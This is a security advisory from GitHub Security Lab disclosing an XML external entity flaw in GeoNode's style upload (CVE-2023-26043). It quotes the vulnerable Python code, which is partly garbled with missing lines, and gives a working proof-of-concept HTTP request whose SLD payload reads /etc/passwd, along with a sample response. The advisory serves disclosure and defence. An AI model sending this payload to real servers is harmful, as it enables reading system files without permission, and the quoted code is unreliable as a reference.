skip to content
Back to
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
March 23, 2023

GHSL-2022-129: XML External Entity (XXE) injection in GeoNode - CVE-2023-26043

Jorge Rosillo

Coordinated Disclosure Timeline


GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.



Tested Version



Issue: XML External Entity (XXE) injection in GeoServer style upload functionality (GHSL-2022-129)

GeoNode’s GeoServer has the ability to upload new styles for datasets through the dataset_style_upload view.

def dataset_style_upload(request, layername):
    def respond(*args, **kw):
        kw['content_type'] = 'text/html'
        return json_response(*args, **kw)


    sld = request.FILES['sld'].read() # 1
    sld_name = None
        # Check SLD is valid


        sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES['sld']) # 2
    except Exception as e:
        respond(errors=f"The uploaded SLD file is not valid XML: {e}")

    name = data.get('name') or sld_name

    set_dataset_style(layer, data.get('title') or name, sld)

    return respond(
            'success': True,
            'style': data.get('title') or name, # 3
            'updated': data['update']})

dataset_style_upload gets a user-provided file (1), pass it to extract_name_from_sld to extract an element from it (2) and return the former in the response (3).

def extract_name_from_sld(gs_catalog, sld, sld_file=None):
        if sld:
            if isfile(sld):
                with open(sld, "rb") as sld_file:
                    sld = # 1
            if isinstance(sld, str):
                sld = sld.encode('utf-8')
            dom = etree.XML(sld) # 2

    named_dataset = dom.findall(

    el = None
    if named_dataset and len(named_dataset) > 0:
        user_style = named_dataset[0].findall("{}UserStyle")
        if user_style and len(user_style) > 0:
            el = user_style[0].findall("{}Name") # 3

    return el[0].text # 4

extract_name_from_sld uses sld (which is a path to the provided file), reads it (1) and parses it with etree.XML in 2. Since the former uses a default XMLParser, the parsing gets done with the resolve_entities flag set to True. Therefore, dom handles the parsed XML containing the resolved entity (2), gets NamedLayer.UserStyle.Name in 3 and returns the resolved content in 4.

This issue was found with CodeQL using python’s XML External Entity injection query.

Proof of Concept

  1. Create a guest/non-privileged account and log in.
  2. Upload a dataset through /catalogue/#/upload/dataset whose name we will be referencing as <DATASET_NAME>.
  3. Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of /etc/passwd:
POST /gs/geonode:<DATASET_NAME>/style/upload HTTP/1.1
Host: localhost
Cookie: django_language=en-us; csrftoken=<CSRF-TOKEN>; sessionid=<SESSION-COOKIE>
X-Csrftoken: <CSRF-TOKEN>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo
Content-Length: 485

Content-Disposition: form-data; name="layerid"

Content-Disposition: form-data; name="sld"; filename="foo.sld"
Content-Type: application/octet-stream

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY ent SYSTEM "/etc/passwd" > ]>
<foo xmlns="">

Sample response:

HTTP/1.1 200 OK
Server: nginx/1.23.2

{"success": true, "style": "root:x:0:0:root:/root:/bin/bash...", "updated": false}


This issue may lead to Arbitrary File Read.




This issue was discovered and reported by GHSL team member @jorgectf (Jorge Rosillo).


You can contact the GHSL team at, please include a reference to GHSL-2022-129 in any communication regarding this issue.